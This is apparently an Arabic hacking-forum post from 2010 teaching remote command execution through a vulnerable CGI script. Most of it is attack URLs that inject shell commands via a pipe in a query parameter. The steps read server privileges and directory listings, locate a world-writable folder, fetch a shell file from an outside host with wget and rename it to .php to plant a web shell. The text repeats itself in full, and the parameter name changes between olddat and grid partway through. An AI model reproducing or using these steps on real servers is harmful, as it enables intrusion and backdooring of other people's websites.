الهكر المجهول
01-22-2010, 10:06 PM
http://www.m0dy.net/vb/imgcache/35.imgcache
نبدا شرح الثغرة
- Remote Command Execution
هى اسهل ولكن طبعا الواجهه الرسوميه للشل تجعل منه اسهل واحسن فى التعامل
هى ثغرات يتم من خلالها تنفيذ اوامر الشل بدون رفع شل من خلال خطا معين
مثالــــــــــــ "
http://www.site.org/cgi-bin/probe.cgi?olddat=|id|
نفس التقسيم
Index of / (http://www.site.org) عنوان الموقع
cgi-bin/probe.cgi مسار الملف المصاب وهوداخل مجلد
olddat= الاستغلال اوالخطا داخل الملف
|id| ده امر من اوامر الشل وهومعرفه الصلاحيات
طيب تمام
خلونا بقى نعرف بعض انواع التعامل مع هذه الثغرات
http://www.site.org/cgi-bin/probe.cgi?olddat=|id|
ماذا سيظهر لنا
سيظهر صلاحياتنا على السيرفر
uid=99(nobody) gid=99(nobody)
طيب عايزين نعرف مكانا على السيرفر نشيل الامر id ونحط الامر pwd
بالشكل ده
www.site.com/cgi.bin/probe.cgi?grid=|pwd|
حيظهر
/home/user/cgi.bin
طيب عايزين نعرف هل مسموح لنا برفع ملفات ام لا
بالامر which wget بالشكل ده
www.site.com/cgi.bin/probe.cgi?grid=|which wget|
حيظهر مثلا
usr/bin/wget اخر حاجه wget يعنى مسموحبرفع ملفات
طيب مسموح على اى مجلد بالضبط نكتب الامر ls -la بالشكل ده
www.site.com/cgi.bin/probe.cgi?grid=|ls -la|
بتظهر لك ملفات ومجلدات الموقع واما مهم تصريحاتهم
انت ابحث عن المجلد اللي له التصريح
drwxrwxrwx وحنتكلم عن التصاريح بعدين
طيب كويس
لقيت التصريح مثلا على مجلد images
نروح لمجلد images
طيب احنا فين احنا على المسار
home/user/cgi-bin
ومجلد الصور موجود على المسار
home/user/public_html/images
يبقى احنا ندخل عليه بالامر
cd /home/user/public_html/images بالشكل....
http://www.site.org/cgi-bin/probe.cgi?olddat=|cd //home/user/public_html/images|
دخلنا على المجلد عايزين نرفع عليه مثلا شل
والشل موجود على الرابط
http://www.site.com/sell.txt
نكتب الامر wget http://www.site.com/shell.txt بالشكل
http://www.site.org/cgi-bin/probe.cgi?olddat=|wget http://www.site.com/shell.txt|
كويس
بس الشل بامتداد txt واحنا علشان ننفذ الاوامر لازم يكون بامتداد php او asp على حسب النظام
يبقى نكتب الامر mv shell.txt shell.php
وندخل على الشل من المسار
www.site.com/images/shell.php
وكده خلص النوع الثانى من الثغرات
نبدا شرح الثغرة
- Remote Command Execution
هى اسهل ولكن طبعا الواجهه الرسوميه للشل تجعل منه اسهل واحسن فى التعامل
هى ثغرات يتم من خلالها تنفيذ اوامر الشل بدون رفع شل من خلال خطا معين
مثالــــــــــــ "
http://www.site.org/cgi-bin/probe.cgi?olddat=|id|
نفس التقسيم
Index of / (http://www.site.org) عنوان الموقع
cgi-bin/probe.cgi مسار الملف المصاب وهوداخل مجلد
olddat= الاستغلال اوالخطا داخل الملف
|id| ده امر من اوامر الشل وهومعرفه الصلاحيات
طيب تمام
خلونا بقى نعرف بعض انواع التعامل مع هذه الثغرات
http://www.site.org/cgi-bin/probe.cgi?olddat=|id|
ماذا سيظهر لنا
سيظهر صلاحياتنا على السيرفر
uid=99(nobody) gid=99(nobody)
طيب عايزين نعرف مكانا على السيرفر نشيل الامر id ونحط الامر pwd
بالشكل ده
www.site.com/cgi.bin/probe.cgi?grid=|pwd|
حيظهر
/home/user/cgi.bin
طيب عايزين نعرف هل مسموح لنا برفع ملفات ام لا
بالامر which wget بالشكل ده
www.site.com/cgi.bin/probe.cgi?grid=|which wget|
حيظهر مثلا
usr/bin/wget اخر حاجه wget يعنى مسموحبرفع ملفات
طيب مسموح على اى مجلد بالضبط نكتب الامر ls -la بالشكل ده
www.site.com/cgi.bin/probe.cgi?grid=|ls -la|
بتظهر لك ملفات ومجلدات الموقع واما مهم تصريحاتهم
انت ابحث عن المجلد اللي له التصريح
drwxrwxrwx وحنتكلم عن التصاريح بعدين
طيب كويس
لقيت التصريح مثلا على مجلد images
نروح لمجلد images
طيب احنا فين احنا على المسار
home/user/cgi-bin
ومجلد الصور موجود على المسار
home/user/public_html/images
يبقى احنا ندخل عليه بالامر
cd /home/user/public_html/images بالشكل....
http://www.site.org/cgi-bin/probe.cgi?olddat=|cd //home/user/public_html/images|
دخلنا على المجلد عايزين نرفع عليه مثلا شل
والشل موجود على الرابط
http://www.site.com/sell.txt
نكتب الامر wget http://www.site.com/shell.txt بالشكل
http://www.site.org/cgi-bin/probe.cgi?olddat=|wget http://www.site.com/shell.txt|
كويس
بس الشل بامتداد txt واحنا علشان ننفذ الاوامر لازم يكون بامتداد php او asp على حسب النظام
يبقى نكتب الامر mv shell.txt shell.php
وندخل على الشل من المسار
www.site.com/images/shell.php
وكده خلص النوع الثانى من الثغرات